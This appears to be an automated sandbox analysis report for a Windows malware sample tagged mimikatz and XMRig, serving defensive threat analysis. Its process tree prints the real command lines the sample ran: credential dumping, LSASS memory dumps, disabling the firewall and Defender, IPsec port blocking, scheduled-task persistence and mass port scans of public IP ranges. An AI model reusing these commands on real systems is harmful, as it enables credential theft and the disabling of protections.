Overview

overview

10

Static

static

10

2024-11-14...tz.exe

windows7-x64

10

2024-11-14...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2024 09:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe

  • Size

    9.6MB

  • MD5

    b94dd0f9743e238e5f43aab46e34ba41

  • SHA1

    a8e3c613b799b4ec763168069187e49d32115171

  • SHA256

    05a3beccdc6edf638c343391f63105fe335983af6a45315ce7ff0570b1f90911

  • SHA512

    d4cd1355b566353f48a0508f0ccedfb6571173afd68b3490dbbe9786c18419409a49684e2849e906b51433968829a7278944d0a9cd5c372025580b4a18755837

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Mimikatz family
    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (19308) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 10 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1736
      • C:\Windows\TEMP\eyuduassi\uuetgf.exe
        "C:\Windows\TEMP\eyuduassi\uuetgf.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4424
    • C:\Users\Admin\AppData\Local\Temp\2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4496
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3084
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1476
        • C:\Windows\seumlgyb\lebulsi.exe
          C:\Windows\seumlgyb\lebulsi.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4320
    • C:\Windows\seumlgyb\lebulsi.exe
      C:\Windows\seumlgyb\lebulsi.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4508
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:1688
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1424
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2476
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2632
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3548
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1520
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:624
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:2660
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:4912
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\zthyliniv\eftbbbiir\wpcap.exe
            C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3460
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3584
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:936
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2408
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                    PID:2976
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1796
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:5048
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                    PID:3160
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3212
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4168
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4320
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:3404
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:5032
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1200
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                      PID:3200
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1560
                  • C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe
                    C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2876
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:3352
                  • C:\Windows\zthyliniv\Corporate\vfshost.exe
                    C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2280
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4852
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1360
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:376
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                  2⤵
                    PID:2656
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:908
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:872
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1472
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3056
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:5056
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3144
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2084
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2864
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4588
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1544
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3544
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3652
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1656
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3176
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1412
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4928
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:904
                  • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                    C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 776 C:\Windows\TEMP\zthyliniv\776.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4668
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2632
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                        PID:1560
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3024
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4492
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4576
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1440
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:2520
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1468
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3472
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2840
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop WinDefend
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3344
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4052
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2296
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop wuauserv
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4832
                      • C:\Windows\SysWOW64\net.exe
                        net stop wuauserv
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3680
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop wuauserv
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4284
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                        PID:2220
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:4620
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:960
                        • C:\Windows\SysWOW64\sc.exe
                          sc config SharedAccess start= disabled
                          3⤵
                          • Launches sc.exe
                          • System Location Discovery: System Language Discovery
                          PID:1840
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config WinDefend start= disabled
                        2⤵
                          PID:3228
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:2308
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3672
                          • C:\Windows\SysWOW64\sc.exe
                            sc config wuauserv start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:1636
                        • C:\Windows\TEMP\xohudmc.exe
                          C:\Windows\TEMP\xohudmc.exe
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Suspicious use of SetWindowsHookEx
                          PID:3356
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1020 C:\Windows\TEMP\zthyliniv\1020.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4780
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1736 C:\Windows\TEMP\zthyliniv\1736.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2448
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2440 C:\Windows\TEMP\zthyliniv\2440.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4032
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2576 C:\Windows\TEMP\zthyliniv\2576.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4152
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2748 C:\Windows\TEMP\zthyliniv\2748.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4928
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3048 C:\Windows\TEMP\zthyliniv\3048.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:516
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3792 C:\Windows\TEMP\zthyliniv\3792.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1640
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3892 C:\Windows\TEMP\zthyliniv\3892.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:828
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3956 C:\Windows\TEMP\zthyliniv\3956.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4636
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4040 C:\Windows\TEMP\zthyliniv\4040.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          PID:224
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1904 C:\Windows\TEMP\zthyliniv\1904.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:872
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4020 C:\Windows\TEMP\zthyliniv\4020.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:704
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1820 C:\Windows\TEMP\zthyliniv\1820.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1296
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1408 C:\Windows\TEMP\zthyliniv\1408.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1544
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4892 C:\Windows\TEMP\zthyliniv\4892.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2760
                        • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                          C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2408 C:\Windows\TEMP\zthyliniv\2408.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2100
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c C:\Windows\zthyliniv\eftbbbiir\scan.bat
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3212
                          • C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe
                            ysesbhsym.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:4484
                      • C:\Windows\SysWOW64\zefhau.exe
                        C:\Windows\SysWOW64\zefhau.exe
                        1⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:1060
                      • C:\Windows\system32\cmd.EXE
                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                        1⤵
                          PID:1540
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            2⤵
                              PID:1732
                            • C:\Windows\system32\cacls.exe
                              cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                              2⤵
                                PID:4964
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                              1⤵
                                PID:2448
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  2⤵
                                    PID:3504
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                                    2⤵
                                      PID:2212
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                                    1⤵
                                      PID:5012
                                      • C:\Windows\ime\lebulsi.exe
                                        C:\Windows\ime\lebulsi.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4436

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Reconnaissance

                                    Resource Development

                                    Initial Access

                                    Execution

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Scheduled Task

                                    1
                                    T1053.005

                                    System Services

                                    1
                                    T1569

                                    Service Execution

                                    1
                                    T1569.002

                                    Persistence

                                    Create or Modify System Process

                                    2
                                    T1543

                                    Windows Service

                                    2
                                    T1543.003

                                    Event Triggered Execution

                                    2
                                    T1546

                                    Image File Execution Options Injection

                                    1
                                    T1546.012

                                    Netsh Helper DLL

                                    1
                                    T1546.007

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Scheduled Task

                                    1
                                    T1053.005

                                    Privilege Escalation

                                    Create or Modify System Process

                                    2
                                    T1543

                                    Windows Service

                                    2
                                    T1543.003

                                    Event Triggered Execution

                                    2
                                    T1546

                                    Image File Execution Options Injection

                                    1
                                    T1546.012

                                    Netsh Helper DLL

                                    1
                                    T1546.007

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Scheduled Task

                                    1
                                    T1053.005

                                    Defense Evasion

                                    Impair Defenses

                                    1
                                    T1562

                                    Disable or Modify System Firewall

                                    1
                                    T1562.004

                                    Credential Access

                                    OS Credential Dumping

                                    1
                                    T1003

                                    LSASS Memory

                                    1
